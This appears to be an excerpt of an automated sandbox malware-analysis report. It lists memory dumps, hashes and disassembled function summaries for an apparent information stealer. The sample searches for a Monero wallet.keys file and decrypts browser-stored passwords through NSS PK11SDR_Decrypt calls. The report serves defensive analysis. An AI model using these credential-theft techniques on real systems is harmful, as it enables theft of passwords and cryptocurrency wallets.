Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 176be55fd01874e55e36a9b147ea84e4c85436a66b5932af36748bf8fcdefa5c
Instruction ID: d8405a27e934e1b17f4e2432ce83998d6754fd6c84338a31aa140cb0d03f3a08
Opcode Fuzzy Hash: 176be55fd01874e55e36a9b147ea84e4c85436a66b5932af36748bf8fcdefa5c
Instruction Fuzzy Hash: 57E1F371911118EAEF55FB60CC55EEE7378AF94340F4081A9B51E62052EF386F8ACF92

Function 6CBBD4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CC1E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CBCD1C5), ref: 6CBBD4F2
LeaveCriticalSection.KERNEL32(6CC1E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CBCD1C5), ref: 6CBBD50B

Part of subcall function 6CB9CFE0: EnterCriticalSection.KERNEL32(6CC1E784), ref: 6CB9CFF6
Part of subcall function 6CB9CFE0: LeaveCriticalSection.KERNEL32(6CC1E784), ref: 6CB9D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CBCD1C5), ref: 6CBBD52E
EnterCriticalSection.KERNEL32(6CC1E7DC), ref: 6CBBD690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CBBD6A6
LeaveCriticalSection.KERNEL32(6CC1E7DC), ref: 6CBBD712
LeaveCriticalSection.KERNEL32(6CC1E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CBCD1C5), ref: 6CBBD751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CBBD7EA

Strings

<jemalloc>, xrefs: 6CBBD827
: (malloc) Error initializing arena, xrefs: 6CBBD82C

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: 44078e448a931d170fc670564caaffcfb7c020344bc522a1181014d9bfed7e20
Instruction ID: dcc30d90eb27536ec0b94e957b798b3252ae564a088088eeddb8a5ef90de233e
Opcode Fuzzy Hash: 44078e448a931d170fc670564caaffcfb7c020344bc522a1181014d9bfed7e20
Instruction Fuzzy Hash: C191B071A047818FE714CF3AD19466AB7F1FB99314F14892ED45AD7E84DB34E844CB82

Function 0076DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00780C2E), ref: 0076DE5E
StrCmpCA.SHLWAPI(?,007814C8), ref: 0076DEAE
StrCmpCA.SHLWAPI(?,007814CC), ref: 0076DEC4
FindNextFileA.KERNEL32(000000FF,?), ref: 0076E3E0
FindClose.KERNEL32(000000FF), ref: 0076E3F2

Strings

\*.*, xrefs: 0076DE26

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: \*.*
API String ID: 2325840235-1173974218
Opcode ID: a0cbe7279685f0cc5d7ad4f28bb0c5711f7d1bde1931af0dbac05b48ad28b80b
Instruction ID: f5fc4aebcad11b794565269524aac2c7641258cf5d9bdf7779d424d146f8a2d2
Opcode Fuzzy Hash: a0cbe7279685f0cc5d7ad4f28bb0c5711f7d1bde1931af0dbac05b48ad28b80b
Instruction Fuzzy Hash: 7CF18271914118EAEF16FB60CC59EEE7378BF55340F8081A9A51E62051DF386F4ACF62

Function 00B2BEA5 Relevance: 14.1, Strings: 10, Instructions: 1551COMMON

Download Yara Rule

Strings

( 7^, xrefs: 00B2D0F3
:vO, xrefs: 00B2C76E
6/o, xrefs: 00B2C8B9
!}, xrefs: 00B2D0FC
( 7^, xrefs: 00B2D13C
_R;, xrefs: 00B2CE33
H]x~, xrefs: 00B2CC7B
6/o, xrefs: 00B2C89A
e6, xrefs: 00B2C1C6
K}k_, xrefs: 00B2C9FD

Memory Dump Source

Source File: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ( 7^$( 7^$6/o$6/o$H]x~$K}k_$!}$:vO$_R;$e6
API String ID: 0-2194442654
Opcode ID: 718d799bcf88c84333115f8debd34c16fe97270108d4220408e3cba1496ee54a
Instruction ID: fc11c506ff6e01fac964e06e6f1b9c009dd899076735e94dbb44fbe720e53de5
Opcode Fuzzy Hash: 718d799bcf88c84333115f8debd34c16fe97270108d4220408e3cba1496ee54a
Instruction Fuzzy Hash: E4B2B1F360C2009FE304AE29EC85B7AB7E9EF94720F1A493DE6C5C3740E63598458697

Function 0076C820 Relevance: 13.6, APIs: 9, Instructions: 95stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0076C871
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0076C87C
PK11_GetInternalKeySlot.NSS3 ref: 0076C88A
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0076C8A5
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0076C8EB
lstrcat.KERNEL32(?,00780B46), ref: 0076C943
lstrcat.KERNEL32(?,00780B47), ref: 0076C957
PK11_FreeSlot.NSS3(?), ref: 0076C961
lstrcat.KERNEL32(?,00780B4E), ref: 0076C978

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlen
String ID:
API String ID: 3356303513-0
Opcode ID: 6d3a535fe7d90093228b29e43575a17d060d34a2bc5e0b4d0dca32bd49d9d80a
Instruction ID: 76a06c118f5d717bf5ad1df26fe3e0f176c8bf58bcf2da9443067b5bc7121d40
Opcode Fuzzy Hash: 6d3a535fe7d90093228b29e43575a17d060d34a2bc5e0b4d0dca32bd49d9d80a
Instruction Fuzzy Hash: CA416FB591421ADBDB10DFA4DD89BFEB7B8BF48304F1041A8E509A7280D7746A84DFD1

Function 6CBE2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CBE2C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CBE2C61

Part of subcall function 6CB94DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CB94E5A
Part of subcall function 6CB94DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CB94E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CBE2C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CBE2E2D

Part of subcall function 6CBA81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6CBA81DE

Strings

expected a Time entry, xrefs: 6CBE2E36
(root), xrefs: 6CBE354F
ProfileBuffer parse error: %s, xrefs: 6CBE2E3B

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: ad041f3c728833aec75221e6349554e4882f3d683e9171cf99d5b47c735b5741
Instruction ID: b03a878b27dbf7f3872bcb88303f27a92759fc8273b353dbdb0511d324bdadfa
Opcode Fuzzy Hash: ad041f3c728833aec75221e6349554e4882f3d683e9171cf99d5b47c735b5741
Instruction Fuzzy Hash: 3591CF706087818FD724CF28C49469FB7E0EF89798F108A1DE99A87B50EB30D949CB53

Function 6CB9D4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON

Download Yara Rule

Strings

9, xrefs: 6CB9DE7F
8, xrefs: 6CB9DC08
, xrefs: 6CB9DA88
@, xrefs: 6CB9DAF6
0, xrefs: 6CB9DC7F
-, xrefs: 6CB9D7DD
0, xrefs: 6CB9D852
1, xrefs: 6CB9DBDD

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID:
String ID: $-$0$0$1$8$9$@
API String ID: 0-3654031807
Opcode ID: a628a9e3a77e4c9e666b4d02eebc75b2922669363c284d24f7fa80624a107326
Instruction ID: 687ed9c84b710a449636ad32b76ee4153ad2d7f73cd7d0ea7ed6b3aa76410f60
Opcode Fuzzy Hash: a628a9e3a77e4c9e666b4d02eebc75b2922669363c284d24f7fa80624a107326
Instruction Fuzzy Hash: D2628C7160C7858FDB01CE3AE09075ABBE2EF87358F284A2DE8D54BA51D3359985CB43

Function 00B2D8C0 Relevance: 9.2, Strings: 6, Instructions: 1667COMMON

Download Yara Rule

Strings

`:x3, xrefs: 00B2D9EB
Ch, xrefs: 00B2E24B
;vyc, xrefs: 00B2D97C
+J?, xrefs: 00B2E0DC
^O, xrefs: 00B2E743
rF52, xrefs: 00B2E4BF

Memory Dump Source

Source File: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID:
String ID: +J?$;vyc$Ch$^O$`:x3$rF52
API String ID: 0-1541466030
Opcode ID: 1124c7876d98b2c5de3ac5864729dd507b838b734ac02c301a87fb153b7de309
Instruction ID: 83f3805c8ee1d3b81995eb54a0a182c95f47117ffbc900705347534e6e7a820d
Opcode Fuzzy Hash: 1124c7876d98b2c5de3ac5864729dd507b838b734ac02c301a87fb153b7de309
Instruction Fuzzy Hash: 4BB2F5F360C2049FE3046E2DEC8567AFBE9EF94720F1A493DEAC5C7744EA3558018696

Function 00B2F3CB Relevance: 9.1, Strings: 6, Instructions: 1612COMMON

Download Yara Rule

Strings

A!mv, xrefs: 00B2FB74
0pg#, xrefs: 00B3031B
G0?9, xrefs: 00B2FDB8
;/H, xrefs: 00B30438
wf1, xrefs: 00B2F3DC
JP>, xrefs: 00B2F517

Memory Dump Source

Source File: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0pg#$;/H$A!mv$G0?9$wf1$JP>
API String ID: 0-438214911
Opcode ID: 519eb5030ab27f55a994fc7fa61b293081fe2fb87bf84cfe011a63bb1fb55f64
Instruction ID: d35ab832fb34599c980b9f8ba6c9c5013b2dda0fb9a22708f691e024defcc0ee
